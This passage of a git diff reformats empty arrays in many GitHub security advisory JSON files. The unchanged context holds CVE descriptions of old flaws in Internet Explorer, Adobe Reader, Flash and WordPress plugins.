-32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-37ch-hhvp-9r99/GHSA-37ch-hhvp-9r99.json b/advisories/unreviewed/2022/05/GHSA-37ch-hhvp-9r99/GHSA-37ch-hhvp-9r99.json index f814a94d3bb..51cfcf75249 100644 --- a/advisories/unreviewed/2022/05/GHSA-37ch-hhvp-9r99/GHSA-37ch-hhvp-9r99.json +++ b/advisories/unreviewed/2022/05/GHSA-37ch-hhvp-9r99/GHSA-37ch-hhvp-9r99.json @@ -7,12 +7,8 @@ "CVE-2012-1545" ], "details": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-37pj-6fcr-2jjq/GHSA-37pj-6fcr-2jjq.json b/advisories/unreviewed/2022/05/GHSA-37pj-6fcr-2jjq/GHSA-37pj-6fcr-2jjq.json index 11eecee3287..b4935c2e94a 100644 --- a/advisories/unreviewed/2022/05/GHSA-37pj-6fcr-2jjq/GHSA-37pj-6fcr-2jjq.json +++ b/advisories/unreviewed/2022/05/GHSA-37pj-6fcr-2jjq/GHSA-37pj-6fcr-2jjq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-389v-gchg-grxf/GHSA-389v-gchg-grxf.json b/advisories/unreviewed/2022/05/GHSA-389v-gchg-grxf/GHSA-389v-gchg-grxf.json index 60286b8af98..b203cbd794c 100644 --- a/advisories/unreviewed/2022/05/GHSA-389v-gchg-grxf/GHSA-389v-gchg-grxf.json +++ b/advisories/unreviewed/2022/05/GHSA-389v-gchg-grxf/GHSA-389v-gchg-grxf.json @@ -7,12 +7,8 @@ "CVE-2010-3327" ], "details": "The implementation of HTML content creation in Microsoft Internet Explorer 6 through 8 does not remove the Anchor element during pasting and editing, which might allow remote attackers to obtain sensitive deleted information by visiting a web page, aka \"Anchor Element Information Disclosure Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-398j-r5c5-vrph/GHSA-398j-r5c5-vrph.json b/advisories/unreviewed/2022/05/GHSA-398j-r5c5-vrph/GHSA-398j-r5c5-vrph.json index 0d25b301078..54dc8ccc89b 100644 --- a/advisories/unreviewed/2022/05/GHSA-398j-r5c5-vrph/GHSA-398j-r5c5-vrph.json +++ b/advisories/unreviewed/2022/05/GHSA-398j-r5c5-vrph/GHSA-398j-r5c5-vrph.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-39hj-fwhh-gc6w/GHSA-39hj-fwhh-gc6w.json b/advisories/unreviewed/2022/05/GHSA-39hj-fwhh-gc6w/GHSA-39hj-fwhh-gc6w.json index 4a4020710de..2d846b884aa 100644 --- a/advisories/unreviewed/2022/05/GHSA-39hj-fwhh-gc6w/GHSA-39hj-fwhh-gc6w.json +++ b/advisories/unreviewed/2022/05/GHSA-39hj-fwhh-gc6w/GHSA-39hj-fwhh-gc6w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3c6g-x8mc-8hqx/GHSA-3c6g-x8mc-8hqx.json b/advisories/unreviewed/2022/05/GHSA-3c6g-x8mc-8hqx/GHSA-3c6g-x8mc-8hqx.json index b196208ed07..5d704bc8a8c 100644 --- a/advisories/unreviewed/2022/05/GHSA-3c6g-x8mc-8hqx/GHSA-3c6g-x8mc-8hqx.json +++ b/advisories/unreviewed/2022/05/GHSA-3c6g-x8mc-8hqx/GHSA-3c6g-x8mc-8hqx.json @@ -7,12 +7,8 @@ "CVE-2015-1211" ], "details": "The OriginCanAccessServiceWorkers function in content/browser/service_worker/service_worker_dispatcher_host.cc in Google Chrome before 40.0.2214.111 on Windows, OS X, and Linux and before 40.0.2214.109 on Android does not properly restrict the URI scheme during a ServiceWorker registration, which allows remote attackers to gain privileges via a filesystem: URI.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -80,9 +76,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3cfr-rpp6-j86f/GHSA-3cfr-rpp6-j86f.json b/advisories/unreviewed/2022/05/GHSA-3cfr-rpp6-j86f/GHSA-3cfr-rpp6-j86f.json index b7587668224..bb7ff0cc741 100644 --- a/advisories/unreviewed/2022/05/GHSA-3cfr-rpp6-j86f/GHSA-3cfr-rpp6-j86f.json +++ b/advisories/unreviewed/2022/05/GHSA-3cfr-rpp6-j86f/GHSA-3cfr-rpp6-j86f.json @@ -7,12 +7,8 @@ "CVE-2012-2034" ], "details": "Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X; before 10.3.183.20 and 11.x before 11.2.202.236 on Linux; before 11.1.111.10 on Android 2.x and 3.x; and before 11.1.115.9 on Android 4.x, and Adobe AIR before 3.3.0.3610, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2037.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3fv2-9g2f-63h7/GHSA-3fv2-9g2f-63h7.json b/advisories/unreviewed/2022/05/GHSA-3fv2-9g2f-63h7/GHSA-3fv2-9g2f-63h7.json index 3604e016f10..0f4aa34cb90 100644 --- a/advisories/unreviewed/2022/05/GHSA-3fv2-9g2f-63h7/GHSA-3fv2-9g2f-63h7.json +++ b/advisories/unreviewed/2022/05/GHSA-3fv2-9g2f-63h7/GHSA-3fv2-9g2f-63h7.json @@ -7,12 +7,8 @@ "CVE-2015-0312" ], "details": "Double free vulnerability in Adobe Flash Player before 13.0.0.264 and 14.x through 16.x before 16.0.0.296 on Windows and OS X and before 11.2.202.440 on Linux allows attackers to execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3gh5-8j6v-4qqc/GHSA-3gh5-8j6v-4qqc.json b/advisories/unreviewed/2022/05/GHSA-3gh5-8j6v-4qqc/GHSA-3gh5-8j6v-4qqc.json index 9f2d09f3e2d..2a8af3771e2 100644 --- a/advisories/unreviewed/2022/05/GHSA-3gh5-8j6v-4qqc/GHSA-3gh5-8j6v-4qqc.json +++ b/advisories/unreviewed/2022/05/GHSA-3gh5-8j6v-4qqc/GHSA-3gh5-8j6v-4qqc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3h3m-5rwm-85rw/GHSA-3h3m-5rwm-85rw.json b/advisories/unreviewed/2022/05/GHSA-3h3m-5rwm-85rw/GHSA-3h3m-5rwm-85rw.json index 64faae339c9..f929e89edb5 100644 --- a/advisories/unreviewed/2022/05/GHSA-3h3m-5rwm-85rw/GHSA-3h3m-5rwm-85rw.json +++ b/advisories/unreviewed/2022/05/GHSA-3h3m-5rwm-85rw/GHSA-3h3m-5rwm-85rw.json @@ -7,12 +7,8 @@ "CVE-2015-7624" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2015-5583, CVE-2015-6705, and CVE-2015-6706.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3hc6-296x-32rp/GHSA-3hc6-296x-32rp.json b/advisories/unreviewed/2022/05/GHSA-3hc6-296x-32rp/GHSA-3hc6-296x-32rp.json index c1c280ded6a..93b9f6c5fd8 100644 --- a/advisories/unreviewed/2022/05/GHSA-3hc6-296x-32rp/GHSA-3hc6-296x-32rp.json +++ b/advisories/unreviewed/2022/05/GHSA-3hc6-296x-32rp/GHSA-3hc6-296x-32rp.json @@ -7,12 +7,8 @@ "CVE-2012-1882" ], "details": "Microsoft Internet Explorer 6 through 9 does not block cross-domain scrolling events, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka \"Scrolling Events Information Disclosure Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3mf6-cpxv-733m/GHSA-3mf6-cpxv-733m.json b/advisories/unreviewed/2022/05/GHSA-3mf6-cpxv-733m/GHSA-3mf6-cpxv-733m.json index a0bef56a4d1..a1467f47252 100644 --- a/advisories/unreviewed/2022/05/GHSA-3mf6-cpxv-733m/GHSA-3mf6-cpxv-733m.json +++ b/advisories/unreviewed/2022/05/GHSA-3mf6-cpxv-733m/GHSA-3mf6-cpxv-733m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3mpv-xg32-wjg6/GHSA-3mpv-xg32-wjg6.json b/advisories/unreviewed/2022/05/GHSA-3mpv-xg32-wjg6/GHSA-3mpv-xg32-wjg6.json index e5b7429261e..595da73d5c7 100644 --- a/advisories/unreviewed/2022/05/GHSA-3mpv-xg32-wjg6/GHSA-3mpv-xg32-wjg6.json +++ b/advisories/unreviewed/2022/05/GHSA-3mpv-xg32-wjg6/GHSA-3mpv-xg32-wjg6.json @@ -7,12 +7,8 @@ "CVE-2010-5071" ], "details": "The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3p6j-59jx-xr88/GHSA-3p6j-59jx-xr88.json b/advisories/unreviewed/2022/05/GHSA-3p6j-59jx-xr88/GHSA-3p6j-59jx-xr88.json index b111275f24f..9a021c96a53 100644 --- a/advisories/unreviewed/2022/05/GHSA-3p6j-59jx-xr88/GHSA-3p6j-59jx-xr88.json +++ b/advisories/unreviewed/2022/05/GHSA-3p6j-59jx-xr88/GHSA-3p6j-59jx-xr88.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3rf6-3w37-m7h7/GHSA-3rf6-3w37-m7h7.json b/advisories/unreviewed/2022/05/GHSA-3rf6-3w37-m7h7/GHSA-3rf6-3w37-m7h7.json index 56531e289c5..d184d89957c 100644 --- a/advisories/unreviewed/2022/05/GHSA-3rf6-3w37-m7h7/GHSA-3rf6-3w37-m7h7.json +++ b/advisories/unreviewed/2022/05/GHSA-3rf6-3w37-m7h7/GHSA-3rf6-3w37-m7h7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3rvj-2vfj-frq8/GHSA-3rvj-2vfj-frq8.json b/advisories/unreviewed/2022/05/GHSA-3rvj-2vfj-frq8/GHSA-3rvj-2vfj-frq8.json index e8aa352d6ae..2fcab352708 100644 --- a/advisories/unreviewed/2022/05/GHSA-3rvj-2vfj-frq8/GHSA-3rvj-2vfj-frq8.json +++ b/advisories/unreviewed/2022/05/GHSA-3rvj-2vfj-frq8/GHSA-3rvj-2vfj-frq8.json @@ -7,12 +7,8 @@ "CVE-2013-2153" ], "details": "The XML digital signature functionality (xsec/dsig/DSIGReference.cpp) in Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.1 allows context-dependent attackers to reuse signatures and spoof arbitrary content via crafted Reference elements in the Signature, aka \"XML Signature Bypass issue.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3v54-844g-9c2g/GHSA-3v54-844g-9c2g.json b/advisories/unreviewed/2022/05/GHSA-3v54-844g-9c2g/GHSA-3v54-844g-9c2g.json index b37536bdad2..fa6d4b26ba2 100644 --- a/advisories/unreviewed/2022/05/GHSA-3v54-844g-9c2g/GHSA-3v54-844g-9c2g.json +++ b/advisories/unreviewed/2022/05/GHSA-3v54-844g-9c2g/GHSA-3v54-844g-9c2g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3w3c-mjx7-5w9f/GHSA-3w3c-mjx7-5w9f.json b/advisories/unreviewed/2022/05/GHSA-3w3c-mjx7-5w9f/GHSA-3w3c-mjx7-5w9f.json index 80280fcae2d..186ee29ee6c 100644 --- a/advisories/unreviewed/2022/05/GHSA-3w3c-mjx7-5w9f/GHSA-3w3c-mjx7-5w9f.json +++ b/advisories/unreviewed/2022/05/GHSA-3w3c-mjx7-5w9f/GHSA-3w3c-mjx7-5w9f.json @@ -7,12 +7,8 @@ "CVE-2015-8458" ], "details": "Heap-based buffer overflow in AGM.dll in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via a multiple-layer PDF document, a different vulnerability than CVE-2015-6696 and CVE-2015-6698.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3wcp-fjfh-pw9r/GHSA-3wcp-fjfh-pw9r.json b/advisories/unreviewed/2022/05/GHSA-3wcp-fjfh-pw9r/GHSA-3wcp-fjfh-pw9r.json index 053249ca651..68ba8ddfc05 100644 --- a/advisories/unreviewed/2022/05/GHSA-3wcp-fjfh-pw9r/GHSA-3wcp-fjfh-pw9r.json +++ b/advisories/unreviewed/2022/05/GHSA-3wcp-fjfh-pw9r/GHSA-3wcp-fjfh-pw9r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4262-ffcv-r365/GHSA-4262-ffcv-r365.json b/advisories/unreviewed/2022/05/GHSA-4262-ffcv-r365/GHSA-4262-ffcv-r365.json index 18cd3e08944..f75d40d1c4c 100644 --- a/advisories/unreviewed/2022/05/GHSA-4262-ffcv-r365/GHSA-4262-ffcv-r365.json +++ b/advisories/unreviewed/2022/05/GHSA-4262-ffcv-r365/GHSA-4262-ffcv-r365.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-42fx-hqwh-j72r/GHSA-42fx-hqwh-j72r.json b/advisories/unreviewed/2022/05/GHSA-42fx-hqwh-j72r/GHSA-42fx-hqwh-j72r.json index 31be5273c23..bd4495b9f45 100644 --- a/advisories/unreviewed/2022/05/GHSA-42fx-hqwh-j72r/GHSA-42fx-hqwh-j72r.json +++ b/advisories/unreviewed/2022/05/GHSA-42fx-hqwh-j72r/GHSA-42fx-hqwh-j72r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-42m6-m8gm-pwp9/GHSA-42m6-m8gm-pwp9.json b/advisories/unreviewed/2022/05/GHSA-42m6-m8gm-pwp9/GHSA-42m6-m8gm-pwp9.json index df87d3bbf39..e5747049717 100644 --- a/advisories/unreviewed/2022/05/GHSA-42m6-m8gm-pwp9/GHSA-42m6-m8gm-pwp9.json +++ b/advisories/unreviewed/2022/05/GHSA-42m6-m8gm-pwp9/GHSA-42m6-m8gm-pwp9.json @@ -7,12 +7,8 @@ "CVE-2010-3340" ], "details": "Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka \"HTML Object Memory Corruption Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4394-5727-8668/GHSA-4394-5727-8668.json b/advisories/unreviewed/2022/05/GHSA-4394-5727-8668/GHSA-4394-5727-8668.json index 24a6547d724..a3f12dbfc9f 100644 --- a/advisories/unreviewed/2022/05/GHSA-4394-5727-8668/GHSA-4394-5727-8668.json +++ b/advisories/unreviewed/2022/05/GHSA-4394-5727-8668/GHSA-4394-5727-8668.json @@ -7,12 +7,8 @@ "CVE-2015-4066" ], "details": "Multiple SQL injection vulnerabilities in admin/handlers.php in the GigPress plugin before 2.3.9 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) show_artist_id or (2) show_venue_id parameter in an add action in the gigpress.php page to wp-admin/admin.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-442q-44xh-2275/GHSA-442q-44xh-2275.json b/advisories/unreviewed/2022/05/GHSA-442q-44xh-2275/GHSA-442q-44xh-2275.json index 389f701cea3..3e19758b08e 100644 --- a/advisories/unreviewed/2022/05/GHSA-442q-44xh-2275/GHSA-442q-44xh-2275.json +++ b/advisories/unreviewed/2022/05/GHSA-442q-44xh-2275/GHSA-442q-44xh-2275.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-447v-mw2w-93h8/GHSA-447v-mw2w-93h8.json b/advisories/unreviewed/2022/05/GHSA-447v-mw2w-93h8/GHSA-447v-mw2w-93h8.json index 1903f088613..5d94b0f77bf 100644 --- a/advisories/unreviewed/2022/05/GHSA-447v-mw2w-93h8/GHSA-447v-mw2w-93h8.json +++ b/advisories/unreviewed/2022/05/GHSA-447v-mw2w-93h8/GHSA-447v-mw2w-93h8.json @@ -7,12 +7,8 @@ "CVE-2015-6701" ], "details": "The ambientIlluminationColor property implementation in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to obtain sensitive information from process memory via a function call, a different vulnerability than CVE-2015-6697, CVE-2015-6699, CVE-2015-6700, CVE-2015-6702, CVE-2015-6703, and CVE-2015-6704.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-44cc-c4hq-r7vv/GHSA-44cc-c4hq-r7vv.json b/advisories/unreviewed/2022/05/GHSA-44cc-c4hq-r7vv/GHSA-44cc-c4hq-r7vv.json index 07834f554c8..e9d0cc71b2f 100644 --- a/advisories/unreviewed/2022/05/GHSA-44cc-c4hq-r7vv/GHSA-44cc-c4hq-r7vv.json +++ b/advisories/unreviewed/2022/05/GHSA-44cc-c4hq-r7vv/GHSA-44cc-c4hq-r7vv.json @@ -7,12 +7,8 @@ "CVE-2015-1494" ], "details": "The FancyBox for WordPress plugin before 3.0.3 for WordPress does not properly restrict access, which allows remote attackers to conduct cross-site scripting (XSS) attacks via an mfbfw[*] parameter in an update action to wp-admin/admin-post.php, as demonstrated by the mfbfw[padding] parameter and exploited in the wild in February 2015.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-44cq-9ww7-c4gc/GHSA-44cq-9ww7-c4gc.json b/advisories/unreviewed/2022/05/GHSA-44cq-9ww7-c4gc/GHSA-44cq-9ww7-c4gc.json index bf6e8c51613..27c4ca296ec 100644 --- a/advisories/unreviewed/2022/05/GHSA-44cq-9ww7-c4gc/GHSA-44cq-9ww7-c4gc.json +++ b/advisories/unreviewed/2022/05/GHSA-44cq-9ww7-c4gc/GHSA-44cq-9ww7-c4gc.json @@ -7,12 +7,8 @@ "CVE-2015-7621" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via a crafted U3D object, a different vulnerability than CVE-2015-5586, CVE-2015-6683, CVE-2015-6684, CVE-2015-6687, CVE-2015-6688, CVE-2015-6689, CVE-2015-6690, CVE-2015-6691, CVE-2015-7615, and CVE-2015-7617.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-44m4-7qrm-jgrm/GHSA-44m4-7qrm-jgrm.json b/advisories/unreviewed/2022/05/GHSA-44m4-7qrm-jgrm/GHSA-44m4-7qrm-jgrm.json index 285ff97cd9e..dc95497ed31 100644 --- a/advisories/unreviewed/2022/05/GHSA-44m4-7qrm-jgrm/GHSA-44m4-7qrm-jgrm.json +++ b/advisories/unreviewed/2022/05/GHSA-44m4-7qrm-jgrm/GHSA-44m4-7qrm-jgrm.json @@ -7,12 +7,8 @@ "CVE-2011-4374" ], "details": "Integer overflow in Adobe Reader 9.x before 9.4.6 on Linux allows attackers to execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-44r9-m5v9-2vmg/GHSA-44r9-m5v9-2vmg.json b/advisories/unreviewed/2022/05/GHSA-44r9-m5v9-2vmg/GHSA-44r9-m5v9-2vmg.json index c5f6891607f..7d6d069713c 100644 --- a/advisories/unreviewed/2022/05/GHSA-44r9-m5v9-2vmg/GHSA-44r9-m5v9-2vmg.json +++ b/advisories/unreviewed/2022/05/GHSA-44r9-m5v9-2vmg/GHSA-44r9-m5v9-2vmg.json @@ -7,12 +7,8 @@ "CVE-2012-0724" ], "details": "Adobe Flash Player before 11.2.202.229 in Google Chrome before 18.0.1025.151 allow attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2012-0725.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-46q5-4w2h-f55p/GHSA-46q5-4w2h-f55p.json b/advisories/unreviewed/2022/05/GHSA-46q5-4w2h-f55p/GHSA-46q5-4w2h-f55p.json index 33d17e22ea3..408970b840e 100644 --- a/advisories/unreviewed/2022/05/GHSA-46q5-4w2h-f55p/GHSA-46q5-4w2h-f55p.json +++ b/advisories/unreviewed/2022/05/GHSA-46q5-4w2h-f55p/GHSA-46q5-4w2h-f55p.json @@ -7,12 +7,8 @@ "CVE-2012-2200" ], "details": "The default configuration of sendmail in IBM AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, allows local users to gain privileges by entering a command in a .forward file in a home directory.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-47pm-99w9-6mx8/GHSA-47pm-99w9-6mx8.json b/advisories/unreviewed/2022/05/GHSA-47pm-99w9-6mx8/GHSA-47pm-99w9-6mx8.json index c747ff4a48a..9be9115f8b0 100644 --- a/advisories/unreviewed/2022/05/GHSA-47pm-99w9-6mx8/GHSA-47pm-99w9-6mx8.json +++ b/advisories/unreviewed/2022/05/GHSA-47pm-99w9-6mx8/GHSA-47pm-99w9-6mx8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-499q-8pr3-6x2f/GHSA-499q-8pr3-6x2f.json b/advisories/unreviewed/2022/05/GHSA-499q-8pr3-6x2f/GHSA-499q-8pr3-6x2f.json index abd465dc118..7c1221f7602 100644 --- a/advisories/unreviewed/2022/05/GHSA-499q-8pr3-6x2f/GHSA-499q-8pr3-6x2f.json +++ b/advisories/unreviewed/2022/05/GHSA-499q-8pr3-6x2f/GHSA-499q-8pr3-6x2f.json @@ -7,12 +7,8 @@ "CVE-2010-1852" ], "details": "Microsoft Internet Explorer, when the Invisible Hand extension is enabled, uses cookies during background HTTP requests in a possibly unexpected manner, which might allow remote web servers to identify specific persons and their product searches via HTTP request logging, related to a \"cross-site data leakage\" issue.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-49mq-rqr9-cq6g/GHSA-49mq-rqr9-cq6g.json b/advisories/unreviewed/2022/05/GHSA-49mq-rqr9-cq6g/GHSA-49mq-rqr9-cq6g.json index dea87b15b80..db881411000 100644 --- a/advisories/unreviewed/2022/05/GHSA-49mq-rqr9-cq6g/GHSA-49mq-rqr9-cq6g.json +++ b/advisories/unreviewed/2022/05/GHSA-49mq-rqr9-cq6g/GHSA-49mq-rqr9-cq6g.json @@ -7,12 +7,8 @@ "CVE-2015-5096" ], "details": "Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5098 and CVE-2015-5105.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-49mx-v59p-m55m/GHSA-49mx-v59p-m55m.json b/advisories/unreviewed/2022/05/GHSA-49mx-v59p-m55m/GHSA-49mx-v59p-m55m.json index 3b8a3675c29..728c1a52850 100644 --- a/advisories/unreviewed/2022/05/GHSA-49mx-v59p-m55m/GHSA-49mx-v59p-m55m.json +++ b/advisories/unreviewed/2022/05/GHSA-49mx-v59p-m55m/GHSA-49mx-v59p-m55m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4f6w-v2mv-qm2r/GHSA-4f6w-v2mv-qm2r.json b/advisories/unreviewed/2022/05/GHSA-4f6w-v2mv-qm2r/GHSA-4f6w-v2mv-qm2r.json index ba61251a6dd..22fcea814e9 100644 --- 